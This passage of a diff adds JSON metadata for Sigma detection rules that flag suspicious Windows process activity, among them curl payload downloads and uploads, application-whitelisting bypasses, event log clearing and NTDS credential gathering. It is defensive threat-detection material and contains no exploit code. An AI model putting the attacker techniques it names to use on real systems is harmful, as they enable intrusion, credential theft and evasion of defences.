in command line. Early version of this utility provided with Microsoft \u201cRoslyn\u201d Community Technology Preview was named 'rcsi.exe'", + "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", + "value": "Suspicious Csi.exe Usage", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", + "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "https://twitter.com/Z3Jpa29z/status/1317545798981324801", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1072", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_win_susp_csi.yml", + "author": "Konstantin Grishchenko, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate usage by software developers" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "value": "Suspicious Curl Usage on Windows", + "meta": { + "refs": [ + "https://twitter.com/max_mal_/status/1542461200797163522", + "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464", + "https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", + "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_curl_download.yml", + "author": "Florian Roth, Nasreddine Bencherchali (updated)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "value": "Suspicious Curl File Upload", + "meta": { + "refs": [ + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://curl.se/docs/manpage.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_curl_fileupload.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "value": "Curl Start Combination", + "meta": { + "refs": [ + "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/01/13", + "filename": "proc_creation_win_susp_curl_start_combo.yml", + "author": "Sreeman, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Administrative scripts (installers)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious curl process start on Windows with set useragent options", + "uuid": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "value": "Suspicious Curl Change User Agents", + "meta": { + "refs": [ + "https://curl.se/docs/manpage.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2022/01/23", + "filename": "proc_creation_win_susp_curl_useragent.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "uuid": "6345b048-8441-43a7-9bed-541133633d7a", + "value": "ZOHO Dctask64 Process Injection", + "meta": { + "refs": [ + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ], + "creation_date": "2020/01/28", + "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown yet" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "uuid": "204b17ae-4007-471b-917b-b917b315c5db", + "value": "Suspicious Del in CommandLine", + "meta": { + "refs": [ + "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ], + "creation_date": "2021/12/02", + "filename": "proc_creation_win_susp_del.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", + "value": "Suspicious Desktopimgdownldr Command", + "meta": { + "refs": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", + "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/07/03", + "filename": "proc_creation_win_susp_desktopimgdownldr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "uuid": "90d50722-0483-4065-8e35-57efaadd354d", + "value": "DevInit Lolbin Download", + "meta": { + "refs": [ + "https://twitter.com/mrd0x/status/1460815932402679809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/01/11", + "filename": "proc_creation_win_susp_devinit_lolbin.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The Devtoolslauncher.exe executes other binary", + "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "value": "Devtoolslauncher.exe Executes Specified Binary", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", + "https://twitter.com/_felamos/status/1179811992841797632", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2019/10/12", + "filename": "proc_creation_win_susp_devtoolslauncher.yml", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "level": "high", + "falsepositive": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", + "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", + "value": "Suspicious DIR Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ], + "creation_date": "2021/12/13", + "filename": "proc_creation_win_susp_dir.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", + "value": "Direct Autorun Keys Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2019/10/25", + "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", + "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "value": "Disable or Delete Windows Eventlog", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1359039665232306183?s=21", + "https://ss64.com/nt/logman.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" + ], + "creation_date": "2021/02/11", + "filename": "proc_creation_win_susp_disable_eventlog.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. before log collection agent installation" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "value": "Disabled IE Security Features", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/06/19", + "filename": "proc_creation_win_susp_disable_ie_features.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown, maybe some security software installer disables these features temporarily" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "value": "Raccine Uninstall", + "meta": { + "refs": [ + "https://github.com/Neo23x0/Raccine", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/01/21", + "filename": "proc_creation_win_susp_disable_raccine.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate deinstallation by administrative staff" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "value": "Execution via Diskshadow.exe", + "meta": { + "refs": [ + "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ], + "creation_date": "2020/10/07", + "filename": "proc_creation_win_susp_diskshadow.yml", + "author": "Ivan Dyachkov, oscd.community", + "level": "high", + "falsepositive": [ + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", + "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", + "value": "DIT Snapshot Viewer Use", + "meta": { + "refs": [ + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/yosqueoy/ditsnap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2020/07/04", + "filename": "proc_creation_win_susp_ditsnap.yml", + "author": "Furkan Caliskan (@caliskanfurkan_)", + "level": "high", + "falsepositive": [ + "Legitimate admin usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", + "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", + "value": "Dllhost Process With No CommandLine", + "meta": { + "refs": [ + "https://redcanary.com/blog/child-processes/", + "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ], + "creation_date": "2022/06/27", + "filename": "proc_creation_win_susp_dllhost_no_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute C# code located in the consoleapp folder", + "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "value": "Application Whitelisting Bypass via Dnx.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ], + "creation_date": "2019/10/26", + "filename": "proc_creation_win_susp_dnx.yml", + "author": "Beyu Denis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate use of dnx.exe by legitimate user" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", + "value": "Suspicious Double Extension", + "meta": { + "refs": [ + "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", + "https://twitter.com/blackorbird/status/1140519090961825792", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], + "creation_date": "2019/06/26", + "filename": "proc_creation_win_susp_double_extension.yml", + "author": "Florian Roth (rule), @blu3_team (idea)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", + "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", + "value": "Suspicious Download from Office Domain", + "meta": { + "refs": [ + "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", + "https://twitter.com/mrd0x/status/1475085452784844803?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/27", + "filename": "proc_creation_win_susp_download_office_domain.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", + "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", + "value": "Suspicious Kernel Dump Using Dtrace", + "meta": { + "refs": [ + "https://twitter.com/0gtweet/status/1474899714290208777?s=12", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" + ], + "tags": "No established tags", + "creation_date": "2021/12/28", + "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", + "value": "Suspicious Electron Application Child Processes", + "meta": { + "refs": [ + "https://taggart-tech.com/quasar-electron/", + "https://github.com/mttaggart/quasar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/10/21", + "filename": "proc_creation_win_susp_electron_app_children.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "value": "Emotet RunDLL32 Process Creation", + "meta": { + "refs": [ + "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", + "https://cyber.wtf/2021/11/15/guess-whos-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2020/12/25", + "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", + "author": "FPT.EagleEye", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", + "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", + "value": "Esentutl Gather Credentials", + "meta": { + "refs": [ + "https://twitter.com/vxunderground/status/1423336151860002816", + "https://attack.mitre.org/software/S0404/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.003" + ], + "creation_date": "2021/08/06", + "filename": "proc_creation_win_susp_esentutl_params.yml", + "author": "sam0x90", + "level": "medium", + "falsepositive": [ + "To be determined" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", + "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", + "value": "Suspicious Eventlog Clear or Configuration Using Wevtutil", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2019/09/26", + "filename": "proc_creation_win_susp_eventlog_clear.yml", + "author": "Ecco, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious execution from an uncommon folder", + "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "value": "Execution from Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_execution_path.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", + "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", + "value": "Execution in Webserver Root Folder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/01/16", + "filename": "proc_creation_win_susp_execution_path_webserver.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Various applications", + "Tools that include ping or nslookup command invocations" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers can use explorer.exe for evading defense mechanisms", + "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", + "value": "Proxy Execution Via Explorer.exe", + "meta": { + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_susp_explorer.yml", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "level": "low", + "falsepositive": [ + "Legitimate explorer.exe run from cmd.exe" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", + "value": "Explorer Process Tree Break", + "meta": { + "refs": [ + "https://twitter.com/CyberRaiju/status/1273597319322058752", + "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/nas_bench/status/1535322450858233858", + "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ], + "creation_date": "2019/06/29", + "filename": "proc_creation_win_susp_explorer_break_proctree.yml", + "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", + "level": "medium", + "falsepositive": [ + "Unknown how many legitimate software products use that method" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "value": "Explorer NOUACCHECK Flag", + "meta": { + "refs": [ + "https://twitter.com/ORCA6665/status/1496478087244095491", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ], + "creation_date": "2022/02/23", + "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", + "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "value": "Suspicious File Characteristics Due to Missing Fields", + "meta": { + "refs": [ + "https://securelist.com/muddywater/88059/", + "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.006" + ], + "creation_date": "2018/11/22", + "filename": "proc_creation_win_susp_file_characteristics.yml", + "author": "Markus Neis, Sander Wiebing", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", + "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", + "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", + "value": "Suspicious Findstr 385201 Execution", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2021/12/16", + "filename": "proc_creation_win_susp_findstr_385201.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", + "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "value": "Findstr Launching .lnk File", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1202", + "attack.t1027.003" + ], + "creation_date": "2020/05/01", + "filename": "proc_creation_win_susp_findstr_lnk.yml", + "author": "Trent Liffick", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", + "value": "Finger.exe Suspicious Invocation", + "meta": { + "refs": [ + "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", + "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/02/24", + "filename": "proc_creation_win_susp_finger_usage.yml", + "author": "Florian Roth, omkar72, oscd.community", + "level": "high", + "falsepositive": [ + "Admin activity (unclear what they do nowadays with finger.exe)" + ], + "logsource.category": "process_creation", + 